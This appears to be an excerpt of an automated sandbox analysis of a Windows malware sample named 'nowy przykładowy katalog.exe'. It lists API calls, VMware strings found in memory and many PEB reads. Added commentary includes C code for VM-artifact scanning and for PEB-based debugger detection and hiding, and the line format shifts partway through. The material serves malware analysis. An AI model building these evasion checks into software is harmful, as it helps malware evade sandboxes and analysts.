Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_004054EC DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, DeleteFileA, FindNextFileA, FindClose, RemoveDirectoryA
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_00402671 FindFirstFileA
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_10002F80 lstrcpyW, lstrlenW, lstrcpyW, lstrcatW, FindFirstFileW, wsprintfW, _GetThemeDocumentationProperty@16, _GetThemeDocumentationProperty@16, FindNextFileW, FindClose
Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.382841011.000000000461E000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
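The memory-string rows above are the kind of hypervisor device identifiers a sample can sweep process memory or the PnP device tree for. As an added example, not code from the report or the sample, the scanner below runs that sweep over a constructed dump excerpt. It matches case-insensitively and in both ANSI and UTF-16LE form, because device paths show up in both (compare the upper-case SCSI\CDROM&VEN_NECVMWAR row with the mixed-case ones, and note that the Windows PnP APIs hand back wide strings). The indicator list and all function names are this example's own choices.

```c
/* Added example (not from the sandbox report or the sample): sweep a memory
 * buffer for hypervisor device identifiers, case-insensitively, in ANSI and
 * UTF-16LE. The indicator table is an illustrative assumption. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <ctype.h>
#include <stdio.h>

static const char *const VM_INDICATORS[] = {
    "VMware", "NECVMWar", "VBOX", "VirtualBox", "QEMU",
    "Virtual_DVD-ROM", "Microsoft Hyper-V"
};
#define N_INDICATORS (sizeof VM_INDICATORS / sizeof VM_INDICATORS[0])

/* Case-insensitive match of an ASCII needle at buf[pos], either as plain
 * bytes (wide == 0) or as UTF-16LE, each byte followed by 0x00 (wide == 1). */
static int match_at(const uint8_t *buf, size_t len, size_t pos,
                    const char *needle, int wide)
{
    size_t n = strlen(needle);
    size_t step = wide ? 2 : 1;
    if (pos + n * step > len)
        return 0;
    for (size_t i = 0; i < n; i++) {
        uint8_t c = buf[pos + i * step];
        if (tolower(c) != tolower((unsigned char)needle[i]))
            return 0;
        if (wide && buf[pos + i * step + 1] != 0)
            return 0;
    }
    return 1;
}

/* Returns a bitmask over VM_INDICATORS: bit k set if indicator k occurs
 * anywhere in buf in either encoding. */
uint32_t scan_vm_indicators(const uint8_t *buf, size_t len)
{
    uint32_t hits = 0;
    for (size_t pos = 0; pos < len; pos++)
        for (size_t k = 0; k < N_INDICATORS; k++)
            if (!(hits & (1u << k)) &&
                (match_at(buf, len, pos, VM_INDICATORS[k], 0) ||
                 match_at(buf, len, pos, VM_INDICATORS[k], 1)))
                hits |= 1u << k;
    return hits;
}

/* Constructed dump excerpt: an upper-case ANSI device ID, a few filler
 * bytes, then a UTF-16LE product string. Returns bytes written (0 if cap
 * is too small). */
size_t build_sample_dump(uint8_t *out, size_t cap)
{
    static const char ansi[] =
        "SCSI\\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\\5&280B647&0&000000";
    static const char wide_src[] = "Msft Virtual_DVD-ROM";
    size_t n = 0;
    if (cap < sizeof ansi + 3 + 2 * sizeof wide_src)
        return 0;
    memcpy(out + n, ansi, sizeof ansi - 1);
    n += sizeof ansi - 1;
    out[n++] = 0x00; out[n++] = 0xCC; out[n++] = 0xCC;   /* unrelated filler */
    for (size_t i = 0; wide_src[i]; i++) {
        out[n++] = (uint8_t)wide_src[i];
        out[n++] = 0x00;
    }
    return n;
}

int main(void)
{
    uint8_t dump[256];
    size_t n = build_sample_dump(dump, sizeof dump);
    uint32_t hits = scan_vm_indicators(dump, n);
    for (size_t k = 0; k < N_INDICATORS; k++)
        if (hits & (1u << k))
            printf("found: %s\n", VM_INDICATORS[k]);
    return 0;
}
```

The same sweep run over a sandbox's own process dumps is a quick way to see which artifacts a VM exposes before a sample ever looks for them; the rows above show explorer.exe carrying both the VMware SATA CD-ROM and a Msft Virtual_DVD-ROM identifier.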
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_10008417 EncodePointer, EncodePointer, ___crtIsPackagedApp, LoadLibraryExW, GetLastError, LoadLibraryExW, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, GetProcAddress, EncodePointer, IsDebuggerPresent, OutputDebugStringW, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer, DecodePointer
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_10003770 rtrystwqtc, GetProcessHeap, RtlAllocateHeap, VirtualProtect
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_004088E0 rdtsc
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug
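The IsDebuggerPresent row above and the long run of "mov eax, dword ptr fs:[00000030h]" reads that follows are the same check at two levels: on 32-bit Windows FS:[0x30] is the PEB pointer, IsDebuggerPresent simply returns PEB+0x02 (BeingDebugged), and code that reads the PEB by hand usually also inspects PEB+0x68 (NtGlobalFlag), where a process created under a debugger carries the heap flags 0x70. As an added example, not code from the report or from the sample, the C below implements both checks against a caller-supplied PEB image so they can be exercised offline, plus the counter-measure a debugger plugin applies. The field offsets are the documented x86 PEB layout; all names and the constructed images are this example's own.

```c
/* Added example (not from the sandbox report or the sample): PEB-based
 * debugger checks behind "mov eax, fs:[30h]" and IsDebuggerPresent, run on
 * a PEB image supplied by the caller. Live reader is Windows x86 only. */
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

#define PEB_OFF_BEING_DEBUGGED 0x02   /* UCHAR, what IsDebuggerPresent returns */
#define PEB_OFF_NTGLOBALFLAG   0x68   /* ULONG, x86 PEB layout */
#define PEB32_IMAGE_SIZE       0x70   /* enough of the PEB to cover both */

#define FLG_HEAP_ENABLE_TAIL_CHECK   0x10
#define FLG_HEAP_ENABLE_FREE_CHECK   0x20
#define FLG_HEAP_VALIDATE_PARAMETERS 0x40
#define DEBUGGER_HEAP_FLAGS (FLG_HEAP_ENABLE_TAIL_CHECK | \
                             FLG_HEAP_ENABLE_FREE_CHECK | \
                             FLG_HEAP_VALIDATE_PARAMETERS)   /* 0x70 */

bool peb_being_debugged(const uint8_t *peb)
{
    return peb[PEB_OFF_BEING_DEBUGGED] != 0;
}

uint32_t peb_nt_global_flag(const uint8_t *peb)
{
    uint32_t v;
    memcpy(&v, peb + PEB_OFF_NTGLOBALFLAG, sizeof v);
    return v;
}

/* All three heap flags set together is the debugger-created signature. */
bool peb_heap_flags_indicate_debugger(const uint8_t *peb)
{
    return (peb_nt_global_flag(peb) & DEBUGGER_HEAP_FLAGS) == DEBUGGER_HEAP_FLAGS;
}

/* Either signal is enough; this is the verdict such code branches on. */
bool peb_debugger_detected(const uint8_t *peb)
{
    return peb_being_debugged(peb) || peb_heap_flags_indicate_debugger(peb);
}

/* Analyst counter-measure: clear both fields, as anti-anti-debug plugins do. */
void peb_hide_debugger(uint8_t *peb)
{
    peb[PEB_OFF_BEING_DEBUGGED] = 0;
    uint32_t v = peb_nt_global_flag(peb) & ~(uint32_t)DEBUGGER_HEAP_FLAGS;
    memcpy(peb + PEB_OFF_NTGLOBALFLAG, &v, sizeof v);
}

#if defined(_WIN32) && defined(__i386__)
/* The instruction the report lists, in GCC/Clang inline-asm syntax. */
const uint8_t *current_peb(void)
{
    const uint8_t *peb;
    __asm__ volatile ("movl %%fs:0x30, %0" : "=r"(peb));
    return peb;
}
#endif

/* Constructed PEB images for demonstration. */
void make_clean_peb(uint8_t *peb)
{
    memset(peb, 0, PEB32_IMAGE_SIZE);
}

void make_debugged_peb(uint8_t *peb)
{
    make_clean_peb(peb);
    peb[PEB_OFF_BEING_DEBUGGED] = 1;
    uint32_t v = DEBUGGER_HEAP_FLAGS;
    memcpy(peb + PEB_OFF_NTGLOBALFLAG, &v, sizeof v);
}

/* Runs detect -> hide -> detect on a debugged image; returns
 * (verdict_before << 1) | verdict_after, so 2 means hiding worked. */
int demo_detect_then_hide(void)
{
    uint8_t peb[PEB32_IMAGE_SIZE];
    make_debugged_peb(peb);
    int before = peb_debugger_detected(peb);
    peb_hide_debugger(peb);
    int after = peb_debugger_detected(peb);
    return (before << 1) | after;
}

int main(void)
{
    printf("detect/hide/detect = %d (2 expected)\n", demo_detect_then_hide());
    return 0;
}
```

Clearing BeingDebugged alone is not enough against code that reads fs:[30h] directly, which is why the hide step also strips the NtGlobalFlag heap bits; the heap headers themselves (HEAP.Flags / ForceFlags) are a further tell that this example does not cover.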
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_10015406 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_1001561A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_100156CB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_1001570A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_10015748 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EF0BF mov eax, dword ptr fs:[00000030h] (2 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A33884 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009F90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E20A0 mov eax, dword ptr fs:[00000030h] (6 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A4B8D0 mov eax, dword ptr fs:[00000030h] (5 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E002D mov eax, dword ptr fs:[00000030h] (5 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A37016 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009CB02A mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A84015 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009D0050 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A72073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A81074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A351BE mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009DC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E61A0 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BB1E1 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B9100 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E513A mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009D4120 mov eax, dword ptr fs:[00000030h] (4 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009DB944 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BB171 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009ED294 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009CAAB0 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h] (5 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009D3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h] (3 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BAA16 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009C8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009F4A2C mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A6B260 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A88A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009F927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A7EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A44257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A85BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009C1B8F mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A6D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A7138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A353CA mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009DDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h] (6 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A7131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E3B7A mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A88B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009C849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A714FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A88CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h] (14 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009D746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A4C450 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A805AC mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009EFD9B mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h] (5 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A68DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h] (5 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A3A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A88D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A7E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h] (13 reads)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009BAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009D7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009F3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00A33540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71608 mov eax, dword ptr fs:[00000030h]
